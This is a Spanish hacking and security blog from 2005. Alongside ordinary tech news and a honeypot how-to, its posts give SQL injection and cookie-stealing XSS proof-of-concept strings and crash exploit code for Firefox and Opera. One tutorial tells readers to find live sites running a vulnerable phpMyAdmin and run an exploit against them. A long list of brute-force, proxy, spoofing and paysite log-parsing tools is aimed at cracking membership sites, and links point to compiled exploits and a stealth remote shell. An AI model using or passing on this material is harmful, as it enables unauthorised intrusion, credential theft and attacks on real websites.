”No encontramos justificable que Microsoft, en este contexto, tenga la necesidad de recolectar y almacenar tanta información, como de hecho lo hace con Windows Live Safety Scanner”. La explicación aducida por Microsoft para explicar la copiosa recolección de datos es que estos son usados para mejorar el producto. La compañía recalca que los datos recabados son anónimos y no permiten identificar al usuario. ”Aún así, nos llama la atención el volumen de la información recabada”, indica CSIS en su sitio.

Entre las informaciones recogidas por el programa y transmitidas a Microsoft figura el contenido del archivo hosts de Windows, que informa sobre qué sitios han sido visitados, como asimismo la carpeta de inicio y servicios activos, además de los conectores del sistema.

El programa de seguridad también registra información sobre las extensiones de Internet Explorer, como así también el contenido y definiciones del registro de Windows.

CSIS indica además que el nuevo programa Microsoft OneCare Antivirus transmite un considerable volumen de datos a los servidores de Microsoft.

Por lo demás, tanto Life Safety Scanner como OneCare Antivirus motivan elogiosos comentarios de parte de CSIS, por su capacidad de detectar y eliminar virus. Entre los 86 gusanos probados por la consultora, la totalidad fueron detectados por los programas de seguridad de Microsoft. CSIS finaliza su análisis señalando que las versiones beta de ambos programas presentan numerosos errores pequeños, que espera sean eliminados de las versiones definitivas.

Fuente: DiarioTI

Salu2

Simple Machines Forum Memberlist.php SQL Injection Vulnerability

Simple machine Forum es propenso a una vulnerabilidad de SQL Injection.

Esta vulnerabilidad podría permitir ataques en forma remota realizando las preguntas adecuadas de la base de datos, teniendo como resultado la modificación de la lógica de la pregunta u otros ataques. Un ataque exitoso puede permitir a un atacante obtener el login del administrador y ganar el acceso administrativo a un sitio.

Simple machine Forum 1,1 rc1 es vulnerable. Otras versiones anteriores pueden verse afectadas tambien.

Prueba de Concepto:

http://example.com/smf/index.php?action=mlist;sa=all;start='[SQL]

fuente:securityfocus

Salu2

¿Nueva vulnerabilidad en Excel, a subasta en eBay?

Sabemos por experiencia que no exista una forma fácil de manejar el hallazgo de nuevas vulnerabilidades. Si se comunica al webmaster (o al fabricante) puedes recibir una amplia gama de respuestas, que van desde la indiferencia a la amenaza. Si lo haces público, te expones a cosas aún peores. ¿Cuál es entonces el camino a seguir?


Hoy hemos sabido de una nueva alternativa, que ni siquiera se nos había pasado por la cabeza: subastar la vulnerabilidad al mejor postor. Al parecer el camino habría sido abierto por un usuario de eBay, que subasta lo que dice ser una vulnerabilidad completamente nueva en Microsoft Excel...



ACTUALIZACIÓN (15:10 pm): eBay ha retirado la oferta por "violar su política sobre actividades ilegales".

ACTUALIZACIÓN (16:00 pm): La noticia ha sido confirmada por Microsoft.


Parece ser que el subastador incluso ofrece un 10% de descuento a empleados de Microsoft.



  • La noticia


  • Salu2

    Los plug-ins, fuente de inseguridad

    El peligro radica en que estos extras permiten a los intrusos acceder al funcionamiento interno de los productos a los que complementan, exponiendo a veces determinados datos y métodos.


    Idealmente, un plugin estaría bien diseñado y no debería introducir vulnerabilidad alguna en el producto que lo recibe, pero recuerden: "En teoría, teoría y práctica son lo mismo. Pero en la práctica casi nunca lo son...". Les recomiendo leer lo siguiente:

    Plug-ins: a source of insecurity (pdf)

    Salu2

    Numerosos sitios web instalan spyware mediante bug no parcheado de Explorer

    Websense ha emitido una alerta donde dice haber detectado que numerosos sitios web están aprovechando una vulnerabilidad no parcheada de Internet Explorer para instalar programas espía en los ordenadores de los usuarios.


    Según Websense, visitar uno de esos sitios con un Windows XP completamente actualizado provoca que el escritorio del usuario muestre un mensaje avisándole de que su ordenador contiene spyware y ofreciéndole una "solución". Mientras tanto, el PC se conecta a un sitio web del dominio .biz alojado en Estados Unidos, de donde descarga y ejecuta más de diez programas sin que el usuario se entere...

    Websense afirma haber detectado miles de sitios que conectan a esa web e intentan explotar diversas vulnerabilidades de Explorer.

    Salu2



    miércoles, diciembre 07, 2005

    CRShell Stealth: Administración remota silenciosa

    XpyXt, creador del troyano taladrator, entre otras cosas, ha publicado este nuevo programa de administración por consola remota "silenciosa" de sistemas Microsoft Windows .
    Con anterioridad XpyXt ya había publicado el "CRShell" para administración remota desde consola del tipo cliente/servidor.
    El "CRShell Stealth" es un nuevo servidor para utilizar con el cliente del "CRShell" con nuevas características de ejecución silenciosa, gracias al nuevo comando "RSCMD" es capaz de inyectar la consola de ejecución en otros procesos del sistema administrado saltandose por lo tanto los firewalls de salida.
    La versión publicada es la 0.1 y es una beta de testeo, pero según comenta XpyXt en futuras versiones es muy posible que se le incorporen otras funciones como la conexion inversa.
    En la web de XpyXt podeis ver un video sobre el uso del "CRShell Stealth".

    Video demostrativo: http://xpyxt.no-ip.biz/crshellstealth/crshellstealthavi.rar
    Web oficial: http://xpyxt.no-ip.com
    Cliente CRShell: http://xpyxt.no-ip.com/crshell.asp
    Download: CRShell Stealth

    Salu2

    Nuevas funcionalidades de Gmail y publicidad

    Gmail ha introducido hoy alguna novedad digna de mención.

    Por un lado, no se si te habrás dado cuenta de que han colocado justo encima del menu Labels, un pequeño anuncio de su sistema de mensajería Google talk, que por suerte puedes quitar con solo hacer clic encima de la cruz de la esquina del banner. Y es que la zona donde lo han colocado suele ser de bastante uso.

    Por otro lado, ahora, cuando recibes un mensaje de correo electrónico con archivos adjuntos, existe la opción de verlo en el propio navegador como HTML. Así, un archivo de word o pdf puedes visualizarlo directamente sin necesidad de descargarlo o abrirlo con otro programa externo.

    Muchas veces, uno no sabe a ciencia cierta si estas nuevas opciones ya estaban y no me había dado cuenta, o son realmente nuevas. Me queda la duda siempre.

    Salu2

    Firefox 1.5 buffer overflow

    Básicamente firefox logea todos los datos de una URL en el archivo de historia.dat, este pequeño
    script pondrá una data realmente grande y Firefox entonces salvarán esa data en historia.dat. La próxima vez que el firefox se abre,se ¨colgara¨ instantáneamente debido a un buffer overflow -- esto sucederá cada vez, hasta que ustedes borren manualmente el archivo de historia.dat

    Esta prueba del concepto solo impide que alguien pueda volver a abrir su browser despues de ejecutar el exploit. En concreto se trataria de Denial Of Service, sin embargo es posible la ejecucion de codigo con algunas modificaciones.

    Codigo:
    /html/\head/\title/Hola\/title/\script type="text/javascript"/
    function ex() {
    var buffer = "";
    for (var i = 0; i < 5000; i++) {
    buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 500; i++) {
    buffer2 += buffer;
    }
    document.title = buffer2;
    }
    \/script/\/head/\body/MouseHack Dice \a href="javascript:ex();"/CLICK AQUI
    \/a/\/body/\/html
    Para probar si sos vulnerable:

    http://mousehack.noads.info/Fire15.html

    Salu2

    PD:remplazar las ¨\¨ por ¨<->¨ correspondientes

    martes, diciembre 06, 2005

    ¿Como hacer un HoneyPots?

    Sí nunca ha trabajado con honeypots antes, y quiere aprender más, recomendaría que comience con un simple honeypot de baja interacción, como el KFSensor (http://www.keyfocus.net/kfsensor/ Versión Trial ) o Specter (http://www.specter.com/default50.htm Versión Pago) para usuarios de Windows, o Honeyd para usuarios de Unix. Incluso hay un "Kit de herramientas Honeyd para Linux" (Honeyd Linux Toolkit http://www.tracking-hackers.com/solutions/honeyd/ ) para el fácil uso del Honeyd en computadoras Linux, otra alternativa es PatriotBox como servidor honeypot, de (http://www.alkasis.com/?fuseaction=products.submenu&id=48 versión pago).

    Los Honeypots de baja interacción tienen la ventaja de ser más fáciles de usar con poco riesgos, ya que contienen la actividad del atacante. Una vez que haya tenido la oportunidad de trabajar con soluciones de baja interacción, puede tomar las habilidades y el conocimiento que haya desarrollado y trabajar con soluciones de alta interacción.

    ¿Quieres crear tu propio HoneyPots?

    Ambientes Windows:
    Paso 1.
    Bajarnos el entorno Perl (ActivePerl 5.8.6) para windows
    http://www.activestate.com/Products/Download/Download.plex?id=ActivePerl allí encontrará varios formatos, se recomienda bajar el .zip ( http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.6.811-MSWin32-x86-122208.zip , una vez descargado ejecute en línea de comando installer.bat, allí le presentará una serie de opciones que puede dejar por defecto.

    Paso 2.
    Añadir el directorio Perl al PATH. Entre en Mi PC con el click derecho entre en opciones avanzadas, variables de entorno y agregue lo siguiente:
    c:\>path=%path%;c:\perl (o donde haya instalado el Perl).

    Paso 3.
    Bajarnos el entorno Python (ActivePython 2.4.0)
    http://www.activestate.com/Products/Download/Download.plex?id=Activepython
    Una vez instalado el SO (Sitema operativo) estará en la disponibilidad de ejecutar ficheros .py.

    Ahora bien, es imprescindible equipar una máquina diseñada para ser atacada, con un sistema de seguridad. en caso contrario podría volverse en nuestra contra.

    Paso 4
    Bajarnos un script (free) desde http://www.megamultimedia.com/arroba/arroba78/descargas/intrusos.zip de nombre windog, q peso solo 3k y es la mínima expresión de un honeypot, además de configurable es sencillo de instalar y su código es bastante entendible, solo basta tener ciertos conocimientos de programación.

    Una vez descomprimido encontrarás 2 ficheros perl (sendmail.pl y telnet.pl) como tambien un readme del autor del script. Sí el entorno Perl esta corriendo solo tendremos que pulsar dos veces sobre cualquiera de los ficheros nombrados anteriormente y aparecerá una consola indicando que el script esta corriendo. NOTA: "Debemos estar atentos que no exista ningún servicio corriendo en los puertos que se indican en el script (23 si se ejecuta el telnel.pl o el 25 sí se ejecuta el sendmail.pl)"

    Paso 5
    Comprobemos que esta funcionando el script
    Pulsemos sobre telnet.pl dos veces
    ahora por medio de la consola hagamos un telnet
    telnet localhost

    aparecerá algo similar a esto:
    Unix(r) System V release 4.0
    (Brooder)
    Login:

    Estará en espera que se introduzca el login y contraseña de acceso al sistema. El mensaje que muestra por consola puede ser modificado a gusto. Todos los intentos de login y contrseña quedarán reflejados en la ventana en la que se levanto el script y nunca serán válidados porque no esta programado de esa forma, además de que no hay servicio alguno que validar. Sí dejamos corriendo esto por un tiempo con vista a internet se observará como alguien intentará entrar por ese servicio ficticio.

    Para modificar el banner que sale al principio indicando que el visitante acaba de conectarse a un sistema Unix, abre el fichero telnet.pl y modifica la línea:
    $banner ="\n\r\n\rUnix (r) System V Release 4.0 (brooder) \n\r";

    Para el fichero sendmail es exactamente igual.

    Sí usas el fichero sendmail.pl y al hacer conexión via telnet solo reconocerá el comando HELO y reponderá con un saludo y la dirección IP del visistante que acaba de conectarse.

    Los script son tan sencillos que podemos hasta cambiar el puerto, si deseas trabajar con el puerto 23 solo debes cambiar el valor de la variable $port, ejemplo: $port = 22;

    ** Miscelaneas
    Recuerda que la verdadera potencia de los servidores trampa consiste en saber atacar al Script Kiddie donde más les duele. Ten presente que deberás combinar diferentes herramientas de analisis y monitoreo para sacar un verdadero provecho de un HoneyPots.

    Fuentes consultadas:

    HoneyNet Español
    http://his.sourceforge.net/trad/honeynet/
    Zonavirus
    http://www.zonavirus.com/Detalle_Articulo.asp?Articulo=108
    Symantec
    http://www.symantec.com/region/mx/enterprisesecurity/content/framework/LAM_2371.html
    Datafull
    http://www.datafull.com/datahack/informe.php?id=255
    Forzis
    http://www.forzis.com
    Tracking-Hackers
    http://www.tracking-hackers.com


    Bibliografía Recomendada:
    Lanze Spitzner, Honeypots, Tracking Hack-ers, Addison Wesley, 2003.
    The Honeynet Project, Know Your Enemy. Revealing the security tools, tactics, and mo-tives of the blackhat community, Addison Wesley, 2002.
    The Honeynet Project, Know Your Enemy. Honeynets, Noviembre de 2003.
    The Honeynet Project, Know Your Enemy. GenII Honeynets, Noviembre de 2003.
    Eduardo Gallego Revilla, Desarrollo de una Red Virtual de Señuelos para la Detección yAnálisis de Intrusiones en Sistemas Informá-ticos, ETSI de Telecomunicación, UPM. Di-ciembre de 2003.
    Ryan C. Barnett, Monitoring VMware honey-pots, Septiembre de 2002.
    The Honeynet Project, Know Your Enemy. Hot Zoneing, Febrero de 2003.
    Lanze Spitzner, Honeypot Farms, Agosto de 2003.

    Salu2

    Winpooch, el anti-spyware de código abierto para Windows

    Winpooch es un nuevo vigilante para nuestro sistema operativo Windows, de código abierto y libre, por el cual nos vigilará nuestro sistema contra ataques locales o externos. Es un anti-spyware y un anti-troyanos residente en nuestro sistema que, asociado a ClamWin, antivirus de código abierto y multiplataforma, proporcionando una mayor seguridad.

    Disponible para Windows 2000/XP/NT, está realizado en C y disponible en inglés, francés, italiano y polaco. Su desarrollo comenzó como una aplicación que alertaba al usuario de infecciones de virus provenientes de archivos espías y de troyanos, aunque más tarde se decidió que en una nueva versión que se pudiera tomar el control del sistema por parte del usuario.

    Sitio Oficial:
    http://winpooch.free.fr/home/index.php
    Download:
    http://sourceforge.net/project/showfiles.php?group_id=122629&package_id=153949&release_id=374646

    Salu2

    Google Desktop: nueva versión contra la vulnerabilidad de IE

    Con respecto a la grave vulnerabilidad del navegador web 'MS Internet Explorer', y según informa 'TopTechNews', se ha lanzado una nueva versión de 'Google Desktop' que evita que este servicio de Google sea también vulnerable.

    En todo momento se ha querido dejar claro que este agujero de seguridad (cualquier página web externa maliciosa podía realizar búsquedas en nuestro Disco Duro) era debido un problema de 'MS Internet Explorer', que sigue estando sin solucionar y que Google ha 'parcheado' su producto para que no se vea afectado.

    mas info:

    http://www.toptechnews.com/story.xhtml?story_id=01200000A9FC

    Herramientas:Cracker and Spoff

    Bruteforcing Programs:

    *Accessdiver (AD) by Jean Fages
    http://www.accessdiver.com

    *Sentry by Sentinel:
    http://sentinel.deny.de/sentry.php

    Goldeneye by Madmax
    http://madmax.securibox.net/products/goldeneye/goldeneye.htm

    *Form@ (specifically for FORM sites) by SSS -
    http://sss.deny.de/

    httpbugger By Ken78x (specifically for form sites and httpS form sites)
    http://ken78x.securibox.net/

    Caecus by Sentinel (For form sites that require an OCR [t4wsentry.pl])
    http://sentinel.deny.de/Caecus.php

    Ares by Gamoaa -
    http://www.xisp.org/downloads/FACE_Setup.zip

    Brutus
    http://www.hoobie.net/brutus/

    AuthForce by Zachary P. Landau
    http://kapheine.hypa.net/authforce/index.html

    Entry by Sparkleware
    http://www.sparkleware.com/entry/index.html

    Xavior By LithiumSoft
    http://www.btinternet.com/~lithiumsoft/Products.html

    Web Password Checker (WPC) .1 For UNIX by g1soft
    available @ http://www.securityfocus.com/tools/885/scoreit

    Munga Bunga's http Brute Forcer by Munga Bunga
    http://www.hackology.com

    Wordlist Tools:

    *Raptor 3 by Madmax -
    http://madmax.securibox.net/products/raptor/raptor.htm

    *Staph by Ashes -
    available at securibox.net under "downloads"

    Words Extractor
    http://www.intellitamper.com/wordsextractor/

    Parsley by on_a_role_again
    http://www.geocities.com/parsley_home/

    Lucifer by Rhino -
    http://rhino.deny.de/lucifer.php

    ALS_novice by Wolfman -
    http://wolfman.deny.de/tools.html

    Combomania by Gamoaa:
    available at securibox.net under "downloads"

    Z-leecher by Beda
    http://goldmaster.webpark.cz/sleech.html

    S-Generator by Beda
    http://goldmaster.webpark.cz/sgen.html

    S-WordlistTool by Beda
    http://goldmaster.webpark.cz/swordt.html

    Proxy Tools:

    *Proxyrama By Gaamoa -
    http://gaamoa.deny.de/

    *Charon by Rhino -
    http://www.icefortress.com/hosts/rhino/

    *Advanced Proxy Leecher (APL) by Sentinel-
    http://sentinel.deny.de/apl.htm

    Geowhere by Jean Fages (NOT-Freeware) -
    http://www.geowhere.net/

    Proxy List Filter -
    http://www.freeproxy.ru/en/programs/proxy_filter.htm

    AATools by Glocksoft
    http://www.glocksoft.com/aatools.htm

    Proxy Checker by Hell Labs
    http://www.helllabs.com.ua

    Proxy Bag
    http://www.intellitamper.com/proxybag/

    S-Proxy Tool by Beda
    http://goldmaster.webpark.cz/sproxy.html

    Exploiting Tools:

    *Triton (Scanner) by Rhino -
    http://rhino.deny.de/triton/index.php

    *CMX IV by Xtremnet -
    http://xtremet.deny.de/products.htm

    CGI Scanner 4.0
    http://63.249.244.171/cgis4.shtml

    CCBill Local Cgi Exploiter By Ksoze-
    http://ksoze.deny.de/ccbill_exp.html

    IBT2 by wolfman:
    http://wolfman.deny.de/tools.html

    Hephaestus's Ashen Spear by Wolfman:
    http://wolfman.deny.de/HAS.php

    H-scanner by Carpetboy
    http://kellogs.hypermart.net/Carpetboy/HScan/H-Scanner.zip


    Intellitamper
    http://www.intellitamper.com/infos.php

    Putty
    http://www.chiark.greenend.org.uk/~sgtatham/putty/

    Decrypting Tools:

    *John The Ripper (JTR) -
    http://www.openwall.com/john/

    MDcrack (MD5 Cracker) -
    http://membres.lycos.fr/mdcrack/

    Passwords Pro (MD5/MD4/Pass Generator)
    http://www.insidepro.com/eng/passwordspro.shtml

    RainbowCrack Hash Cracker
    http://www.antsight.com/zsl/rainbowcrack/

    Distributed John The Ripper by Luis Parravicini
    http://ktulu.com.ar/en/djohn.php

    Cain and Abel by Massimiliano Montoro
    http://www.oxid.it/cain.html

    Salt Grinder by Wolfman
    http://wolfman.deny.de/SaltGrinder.php

    Log Tools:

    LogRip by Rhino -
    http://rhino.deny.de/logrip.php

    Azarius by Rhino -
    http://rhino.deny.de/azarius.php

    Zimapass Parser by Sentinel:
    http://sentinel.deny.de/zimaparser.htm

    *C-Parse (ccbill.log parser) by Sentinel:
    http://sentinel.deny.de/c_parse.htm

    CCBill USI (CCBILL log parser that removes all dead account PRIOR to decrypting)
    http://membres.lycos.fr/ccbill/

    Accessdiver/Ares Parser by Sentinel:
    http://sentinel.deny.de/ad_ares_parser.htm



    Spoofers:

    Zspoof by wolfman -
    http://wolfman.deny.de/tools.html

    Sploof by Jean Fages -
    http://www.accessdiver.com/sploof.htm

    Final Spoof
    http://www.beatharness.com/finalspoof/

    Spooph by nast0
    http://24.106.100.133/spooph/index.html

    D-Spoof And Others (Russian Site, English Prog)
    http://mspoofer.pisem.net/zaza/index.htm

    MVSLite By Mentor
    http://mvs.freehosting.net/index.html

    Mikho's Online Spoofer (web based spoofer, choose "open" when dialog appears)
    http://www.mikhosoft.com/spoofs/

    QuickSpoof
    http://httpd.chello.nl/~m-koster2/spoofs.htm

    Other Tools:

    Scholar by Sentinel - (History checker)
    http://sentinel.deny.de/scholar.htm

    Crackmate Gold by Xtremet (adultcheck gold pass verifier) -
    http://xtremet.deny.de/products.htm

    Salu2

    Fuentes no confirmadas apuntan a que hackers han vuelto a violar la seguridad del Mac OS X para x86

    Fuentes no confirmadas apuntan a que hackers han vuelto a violar la seguridad del Mac OS X para x86
    Diversos sites indican que nuevamente se han conseguido burlar las restricciones impuestas por Apple para impedir la ejecución del Mac OS X para arquitectura x86 en hardware genérico distinto al fabricado por la compañía de Cupertino. Esto se habría logrado de una forma muy similar si no idéntica a como se consiguió con una versión anterior.

    Según se rumorea en la Red, la versión más reciente del Mac OS X para plataforma x86 (10.4.3) ya ha sido "pirateada" pese a los esfuerzos de Apple para que esto no ocurriese materializados en la inclusión de diversas medidas de comprobación en el software para asegurar que el hardware sobre el cual corre es una computadora construida por la propia Apple. El hacker merecedor de tal honor sería el mismo que consiguió vulnerar las protecciones incluidas en la versión 10.4.1 para x86 del mismo sistema, y que responde al nick Maxxuss.

    mas info:
    http://www.mastermagazine.info/seguridad/8723.php

    salu2

    Blog System v1.2 SQL Injection

    Prueba de Concepto:

    http://[HOST]/index.php?mode=home&cat=-99[SQL]

    http://[HOST]/blog.php?user=[USER]&note=-99[SQL]

    Salu2

    IISWorks ASP KnowledgeBase 2.x XSS vuln.

    Prueba de Concepto:

    /kb.asp?a=%22%3E%3Cscript%3E
    alert('Mouse')%3C/script%3E

    /kb.asp?ID=210&a=%22%3E%3Cscript
    %3Ealert('Mouse')%3C/script%3E

    Salu2

    Sql injection (la Pelicula):-)

    para descargar la pelicula:

    SQL İnjection Sites Hacked

    Download:

    http://download.SaVSaK.CoM/sqlinject2.rar
    http://rapidshare.de/files/8578565/sqlinject2.rar.html

    Admin user = catlaemi
    Admin Pass = iloveyou

    Salu2

    Ya podemos exportar los contactos de GMail

    GMail acaba de añadir en nuestras cuentas de correo otra nueva funcionalidad.
    Y es que muchos de nosotros se habrá encontrado con un enlace con “Nuevas funcionalidades” donde nos describe que ya es posible exportar nuestras listas de contactos para usarlos en otras cuentas de GMail o en otros clientes como Microsoft Outlook Express. Para ser usadas en GMail, la codificación usada es Unicode/UTF-8, aunque para los clientes de correos usa una codificación CSV basada en las preferencias de nuestro idioma ya que hay programas, como Outlook, que no acepta archivos Unicode. En todo caso son archivos CSV, valores separados por coma.

    Por cierto, dirson nos cuenta como acceder y manejar la cuenta web de gmail de una manera segura, que no es otra que entrar mediante la dirección, y ojo a la mayúscula, httpS://gmail.google.com, cuya S debe de estar en mayúscula, por tanto tanto a la hora de introducir nuestros datos como manejar nuestro correo, siempre lo haremos de manera segura.

    Salu2

    lunes, diciembre 05, 2005

    Tutorial:como usar el Remote Directory Traversal Exploit in phpMyAdmin 2.6.4-pl1

    1. Descargamos el exploit

    2. Para buscar web con phpMyAdmin 2.6.4-pl1 ! Nos vamos a aqui.

    <-----Ejemplos de resultados









    3.Ahora ejecutamos el exploit:






    Tipeamos
    perl phpmyadmin.pl

    presionamos ¨enter¨y listo, esperamos que el exploit haga su trabajo

    Salu2

    Microsoft Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)

    Exploit: (source)

    http://secwatch.org/exploits/2005/11/MS05-053_exp.c

    Codigo Compilado:

    http://ciberia.ya.com/webmousehack/gdi32.exe

    Cygwin:

    http://ciberia.ya.com/webmousehack/cygwin1.dll

    Salu2

    Net2FTP, un gestor de FTP vía web


    Net2FTP es un gestor de FTP basado en web que acepta conexiones a cualquier servidor, ya sea anónimo o con contraseña, y que está integramente en castellano, entre otros idiomas. Puedes utilizarla desde la página oficial, o, si no te fías, puedes instalártela en tu servidor si dispone de PHP y MySQL.

    Con esta aplicación puedes subir archivos a tu servidor, renombrarlos, borrarlos, moverlos, bajártelos, cambiarle los permisos, editarlos y guardarlos. También nos permite realizar búsqeudas dentro de un archivo. Otra opción bastante útil es que te permite descargar un archivo comprimido a partir de los archivos que selecciones.

    En definitiva, es una sencilla y fácil de usar aplicación que hace su trabajo. Una buena opción si estamos en un ordenador en el que no podemos instalar un ftp, y necesitamos hacer un pequeño cambio, o subir un archivo.

    http://www.net2ftp.com/index.php

    Salu2

    Arovax, antispyware gratuito y sencillo de usar

    Arovax es una nueva aplicación gratuita que nos servirá para escanear nuestro sistema en busca de archivos espías y eliminarlos. Tan sencillo, claro y con pocas opciones, permitiendo un escaneo rápido y un escaneo profundo, donde nos mantendrá a salvo de spyware y ad-ware.

    Tambien se puede autoejecutar al inicio de windows con el fín de escanear el sistema, actualizar sus firmas y seleccionar las unidades y directorios que queremos escanear.

    Download:

    http://www.arovaxantispyware.com/dl.php

    Salu2

    Cómo conseguir que te funcionen (casi) todas las extensiones en Firefox 1.5

    ¿Para qué actualizarse a Firefox 1.5? Además de ganar estabilidad y seguridad, hay una pequeña funcionalidad que hace que nuestras extensiones dejen de funcionar de una versión a otra. Pero se puede solucionar, para ir tirando hasta que actualicen todas las extensiones. En realidad es un pequeño y viejo truco, que consiste en hacer creer a Firefox que es la versión 1.0, nada más. Los pasos, a continuación:

    * Escribe about:config en la barra de direcciones.
    * Haz click con el botón derecho sobre la página que sale. Dale a añadir Nueva Cadena, y ponle los siguientes atributos:
    Nombre: app.extensions.version
    Valor: 1.0
    * Reinicia Firefox. Activa las extensiones que están deshabilitadas.
    * Reinicia Firefox otra vez, ahora puedes ver cuáles pueden funcionar en Firefox 1.5 y cuáles no.

    Si tienes algún problema siempre puedes volver a buscar la cadena y borrarla.

    CookieDigger v1

    CookieDigger ayuda a identificar la creacion débil de la cookie e implementaciones inseguras de la administración de la sesión por aplicaciones de la web. El instrumento trabaja reuniendo y analizando las cookies publicadas por una aplicación web para múltiples usuarios. El tool informa en la previsibilidad y entropía de la cookie y si la información es crítica, tal como el nombre de usuario y contraseña, se incluyen en los valores de la cookie. ¡Requiere.NET Framework!

    Download:

    http://rapidshare.de/files/8344102/cookiedigger.zip.html

    Salu2

    Herramientas: Newbie Hacking




    Download:

    http://rapidshare.de/files/5803920/NNH.rar

    Password: LeechedfromNeedZ.org

    Salu2

    Opera Web Browser JNI Routine Handling Remote Denial of Service Vulnerability

    version Vulnerable 8.5 y anteriores

    Detalles:
    ----------

    El Navegador ópera es propenso a un remote denial of service

    El problema se presenta cuando el navegador maneja un applet de Java que contiene una rutina de JNI.

    Un ataque exitoso puede causar que el navegador se ¨cuelgue¨.

    Prueba de Concepto:
    ------------------------

    import java.applet.Applet;
    import java.awt.Graphics;

    import netscape.javascript.JSObject;

    public class OperaTest extends Applet{
    static {
    System.out.println("Loaded 1.2");
    }
    public void paint(Graphics g) {
    System.out.println("start");
    try {
    netscape.javascript.JSObject jso = JSObject.getWindow(this);
    System.out.println(jso.getClass());
    com.opera.JSObject j = (com.opera.JSObject ) jso;
    char[] x = new char[1000000];
    for (int y = 0 ; y < x.length; y++) {
    x [y] = 'A';
    }
    String z = new String(x);
    System.out.println("after evalb");
    j.removeMember(z);
    System.out.println("after remove");
    }
    catch (Exception e) {
    e.printStackTrace();
    }
    }
    }

    Mi Prueba de Concepto (utilizando applet)

    http://ciberia.ya.com/webmousehack/OperaCrash.html

    Fuente:packetstorm

    Salu2

    Ataque XSS en Firefox 1.5 y Opera 8.51???

    Prueba de Concepto:

    /anytag
    style="background:url("javascri\Dpt:/*/**/(function a()
    {alert('JavaScript es ejecutado.')})();");"
    //

    otras variantes que se pueden utilizar:

    Código:
    "\d"
    "\D"
    "\0d"
    "\00000d"
    "\d "
    "\00000d "
    "\a"
    "\9"
    e.t.c.

    afectaria a el Opera 8.51 y al Firefox 1.5, testeado con windows XP SP2

    Salu2

    Google groups XSS bug???

    La pagina de http://groups.google.com/group/xxx/pendmsg, seria vulnerable a un ataque de cross-site-scripting.Esto permitiria a un usuario malicioso hacerse con la cookie del administrador de la pagina.

    Escenario de Prueba: si un grupo modera los mensajes antes de permitir un poste, un usuario malicioso puede enviar un mensaje a la pagina vulnerable de ¨pendmsg¨. Si un grupo, no es moderado, pero la tecnologia anti-spam de google sospecha que el mensaje es de un remitente conocido de spam o phisher, el mensaje va a la pagina de ¨pendmsg¨.

    Prueba de Concepto:
    /a class=newlink
    href="http://www.google.com/url?sa=D&q=http://www.google.com?/script/alert(document.cookie)//script/"
    Fuente:securityfocus

    salu2

    viernes, diciembre 02, 2005

    Bienvenidos!!!!

    Hola...este es mi blog personal, en el que ire publicando, en la medida de lo posible, y cuando mis obligaciones me lo permitan, noticias, bugs and exploits,textos,tutoriales,herramientas y pruebas de conceptos de distintas vulnerabilidades, en fin todo lo relacionado con el mundo de la informatica, especialmente en lo referido a la ( in)seguridad. Espero que la pasen bien, y agreguen sus comentarios...Saludos!

    ecoestadistica.com